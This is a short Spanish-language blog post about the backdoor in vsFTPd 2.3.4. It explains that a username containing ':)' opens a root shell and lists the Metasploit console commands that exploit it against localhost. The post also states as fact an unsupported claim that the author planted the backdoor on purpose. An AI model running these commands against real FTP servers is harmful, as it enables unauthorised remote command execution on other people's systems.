Hace poco se descubrió una grave (y estúpida) vulnerabilidad en el famoso vsFTPd v2.3.4, servidor FTP de uso muy extendido. El bug en cuestión es catalogado de Backdoor ya que intencionalmente el creador del software a agregado un usuario universal (supuestamente secreto) con el cual se puede acceder al FTP con permisos de administrador (las razones no se saben, puede ser por si se olvida la contraseña o simplemente las típicas excentricidades que hacen los programadores), pero bueno... en SecurityByDefault detallan más sobre el Backdoor y además postearon los Backdoors más escandalosos para que se entretengan.
El Backdoor consiste en que accediendo al FTP y poniendo de usuario :) se conseguía acceso total y ejecución de comandos en el servidor al devolver una shell del sistema. Así de simple.
Y bueno, para eso les traigo un video de como explotarlo con MSF:
Después de ver el video me dirán "Pero que estupidez, para que hacerlo con Metasploit si es más fácil manualmente", a lo cual respondo que si, pero quería ponerles algo audiovisual (para que no se viera tan pobre el post) y además para nuevamente hacer notar que con MSF se pude hacer de todo...
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a
[+] Salu2
[+] Zion3R
0 Notaciones:
Publicar un comentario